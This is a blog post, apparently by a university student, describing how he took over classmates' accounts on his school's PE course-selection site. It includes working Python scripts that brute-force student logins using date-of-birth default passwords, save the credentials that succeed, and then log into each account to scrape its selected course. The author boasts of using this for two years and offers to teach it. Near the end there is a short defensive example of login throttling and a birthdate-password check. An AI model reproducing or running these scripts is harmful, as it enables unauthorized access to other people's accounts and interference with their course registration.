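The end of every semester is course-selection time, or rather, course-grabbing time.
For first-year newcomers grabbing courses for the first time, nothing could be more novel; it looks roughly like this: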
qiang-ke.gif

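As if pumped full of adrenaline, they camp in front of their computers early; some even heard that internet cafés have faster connections, and so the internet cafés ended up looking like this: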
yun-ku-wang-ba.jpg

As an elder, of course I can't be too young, naive like them.
I have chatted and laughed with America's Wallace, hahaha~~
Of course, I can't out-grab them either ┭┮﹏┭┮

Warning: this article is for technical exchange only; do not use it for illegal purposes.

Main text: making a fortune quietly

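The PE Teaching Department's course-selection website has no CAPTCHA, no login limits and no WAF: "three-nos" for short.
Most importantly, the school generates a default password for everyone, namely the date of birth, for example 19980909. What does that bring to mind?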

  • Create xh.txt and import the student IDs
317XXXXXX1
317XXXXXX2
317XXXXXX3
317XXXXXX4
  • Brute-force the accounts
import requests
import re
import os
import time
s = requests.session()

# Passwords and student IDs
passwd = []
xh = []
with open('xh.txt','r') as f:
    for line in f.readlines():
        xh.append(line.strip('\n'))

# An example URL is used here
url = 'http://xxx.edu.cn/sysLogin.aspx'

# Generate the candidate passwords
for i in range(1996,2000):   
    for j in range(1,13):
        for k in range(1,32):
            passwd.append(str(i)+str(j).rjust(2,'0')+str(k).rjust(2,'0'))

headers = {
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding':'gzip, deflate',
    'Accept-Language':'zh-CN,zh;q=0.9,ja;q=0.8',
    'Cache-Control':'no-cache',
    'Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded',
    'DNT':'1',
    'Host':'xxx.edu.cn',
    'Origin':'http://xxx.edu.cn/',
    'Pragma':'no-cache',
    'Referer':'http://xxx.edu.cn/sysLogin.aspx',
    'Upgrade-Insecure-Requests':'1',
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
}
data = {
    '__EVENTTARGET':'',
    '__EVENTARGUMENT':'',
    'rbtnlJueSe':'学生',
    'btnLogin':'登录',
}

n = 0
pattern1 = r'<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="([^"]+)" />'
pattern2 = r'<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="([^"]+)" />'
pattern3 = r'<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="([^"]+)"'
for j in xh:
    print(j)
    txt = s.get('http://xxx.edu.cn/sysLogin.aspx').text
    data['__VIEWSTATE'] = re.search(pattern1,txt)[1]
    data['__VIEWSTATEGENERATOR'] = re.search(pattern2,txt)[1]
    data['__EVENTVALIDATION'] = re.search(pattern3,txt)[1]
    data['txtUserName'] = j
    for i in passwd:
        data['txtPassword'] = i
        res = s.post(url,data=data,headers=headers,allow_redirects=False)
        if(res.status_code==302):
            n = n + 1
            print("第"+str(n)+"个 密码正确!!!")
            with open('info.txt','a+') as f:
                f.write(data['txtUserName'])
                f.write("\t")
                f.write(data['txtPassword'])
                f.write('\n')
  • See which course each account has selected
import requests
import re
import os
import time
s = requests.session()

zh = []
mm = []


with open('info.txt','r') as f:
    for line in f.readlines():
        zh.append(line.strip('\n').split()[0])
        mm.append(line.strip('\n').split()[1])

url = 'http://xxx.edu.cn/sysLogin.aspx'
headers = {
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding':'gzip, deflate',
    'Accept-Language':'zh-CN,zh;q=0.9,ja;q=0.8',
    'Cache-Control':'no-cache',
    'Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded',
    'DNT':'1',
    'Host':'xxx.edu.cn',
    'Origin':'http://xxx.edu.cn',
    'Pragma':'no-cache',
    'Referer':'http://xxx.edu.cn/sysLogin.aspx',
    'Upgrade-Insecure-Requests':'1',
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
}
data = {
    '__EVENTTARGET':'',
    '__EVENTARGUMENT':'',
    'rbtnlJueSe':'学生',
    'btnLogin':'登录',
}

pattern1 = r'<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="([^"]+)" />'
pattern2 = r'<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="([^"]+)" />'
pattern3 = r'<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="([^"]+)"'
pattern4 = r'<td style="width:150px;white-space:nowrap;">(.*?)</td><td style="white-space:nowrap;">(.*?)</td>'

for i in range(len(mm)):
    print(i)
    data['txtUserName'] = zh[i]
    data['txtPassword'] = mm[i]
    txt = s.get('http://xxx.edu.cn/sysLogin.aspx').text
    data['__VIEWSTATE'] = re.search(pattern1,txt)[1]
    data['__VIEWSTATEGENERATOR'] = re.search(pattern2,txt)[1]
    data['__EVENTVALIDATION'] = re.search(pattern3,txt)[1]
    res = s.post(url,data=data,headers=headers,allow_redirects=False)
    if(res.status_code==302):
        r = s.get('http://xxx.edu.cn/WLS/XuanKe_YiXuan.aspx',headers=headers)
        if(r.status_code==200):
            kc = re.search(pattern4,r.text)[2].strip('&nbsp;')
            if(kc!=''):
                with open('体育选课.txt','a+') as f:
                    f.write(zh[i]+'\t'+mm[i]+'\t'+kc+'\n')
            else:
                pass
  • Results
    TIM截图20190118180623.png
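
The gaps named above (no login limits, and a default password equal to the date of birth) are closed on the server side by throttling failed logins and forcing a change of any date-shaped password. The following is an added example, not part of the original post or the site's code; the class name, thresholds, account IDs and addresses are assumptions constructed for illustration.

```python
import time
from collections import defaultdict, deque
from datetime import datetime

# Added illustration: thresholds below are assumed policy values, not the site's.
MAX_FAILS = 5    # failures tolerated per key inside one window
WINDOW = 900     # window length in seconds


def is_birthdate_password(pw: str) -> bool:
    """True if pw is an 8-digit calendar date (YYYYMMDD), the default scheme described above."""
    if len(pw) != 8 or not pw.isdigit():
        return False
    try:
        datetime.strptime(pw, "%Y%m%d")
        return True
    except ValueError:
        return False


class LoginGuard:
    """Sliding-window failure counter keyed by account and by client address."""

    def __init__(self, max_fails=MAX_FAILS, window=WINDOW):
        self.max_fails, self.window = max_fails, window
        self.fails = defaultdict(deque)  # key -> timestamps of recent failures

    def _recent(self, key, now):
        q = self.fails[key]
        while q and now - q[0] > self.window:  # drop failures older than the window
            q.popleft()
        return len(q)

    def allowed(self, account, addr, now=None):
        """Call before checking the password; False once either key is over the limit."""
        now = time.time() if now is None else now
        return (self._recent(("acct", account), now) < self.max_fails
                and self._recent(("addr", addr), now) < self.max_fails)

    def record(self, account, addr, ok, password, now=None):
        """Apply the policy to one attempt: 'locked', 'denied', 'must_change' or 'ok'."""
        now = time.time() if now is None else now
        if not self.allowed(account, addr, now):
            return "locked"
        if not ok:
            self.fails[("acct", account)].append(now)
            self.fails[("addr", addr)].append(now)
            return "denied"
        self.fails.pop(("acct", account), None)  # address failures are kept on purpose
        return "must_change" if is_birthdate_password(password) else "ok"
```

Keeping the per-address counter after a successful login means one source cannot reset its own budget by logging in to an account it already controls.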

Closing

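I haven't had much to post lately, so I pulled out code I wrote in my first year, back when I was still studying civil engineering, to pad out a post.
I didn't expect that two-year-old code would still run without a single change; it successfully selected my PE courses for two years.
Now I'm in my third year and done selecting PE courses, so it has fulfilled its historic mission.
If a junior schoolgirl from my school happens upon this post, she can contact me by email and I can pass this secret technique on to her, with hands-on teaching.
Junior schoolboys, go away~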
